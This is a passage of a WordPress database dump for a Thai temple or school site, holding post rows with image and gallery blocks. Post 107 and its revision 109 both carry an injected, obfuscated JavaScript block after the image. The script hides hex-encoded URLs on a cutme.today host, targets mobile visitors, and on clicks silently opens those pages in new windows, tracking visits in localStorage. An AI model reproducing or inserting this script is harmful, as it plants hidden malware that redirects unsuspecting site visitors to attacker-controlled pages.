เนื่องในวันอาสาฬหบูชาและวันเข้าพรรษา','','inherit','closed','closed','','104-revision-v1','','','2024-07-29 18:43:42','2024-07-29 11:43:42','',104,'http://watprato.ssk.in.th/?p=106',0,'revision','',0),
(107,1,'2024-07-29 18:44:36','2024-07-29 11:44:36','<!-- wp:generateblocks/image {\"uniqueId\":\"cbb41797\",\"mediaId\":108,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-cbb41797\"><img class=\"gb-image gb-image-cbb41797\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/451958383_122164259396202781_8297728464333363206_n.jpg\" alt=\"\" title=\"451958383_122164259396202781_8297728464333363206_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','จดหมายข่าวประชาสัมพันธ์','','publish','open','open','','%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98','','','2024-07-29 18:44:37','2024-07-29 11:44:37','',0,'http://watprato.ssk.in.th/?p=107',0,'post','',0),
(108,1,'2024-07-29 18:44:25','2024-07-29 11:44:25','','451958383_122164259396202781_8297728464333363206_n','','inherit','open','closed','','451958383_122164259396202781_8297728464333363206_n','','','2024-07-29 18:44:25','2024-07-29 11:44:25','',107,'http://watprato.ssk.in.th/wp-content/uploads/2024/07/451958383_122164259396202781_8297728464333363206_n.jpg',0,'attachment','image/jpeg',0),
(109,1,'2024-07-29 18:44:36','2024-07-29 11:44:36','<!-- wp:generateblocks/image {\"uniqueId\":\"cbb41797\",\"mediaId\":108,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-cbb41797\"><img class=\"gb-image gb-image-cbb41797\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/451958383_122164259396202781_8297728464333363206_n.jpg\" alt=\"\" title=\"451958383_122164259396202781_8297728464333363206_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','จดหมายข่าวประชาสัมพันธ์','','inherit','closed','closed','','107-revision-v1','','','2024-07-29 18:44:36','2024-07-29 11:44:36','',107,'http://watprato.ssk.in.th/?p=109',0,'revision','',0),
(110,1,'2024-07-29 18:45:30','2024-07-29 11:45:30','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"c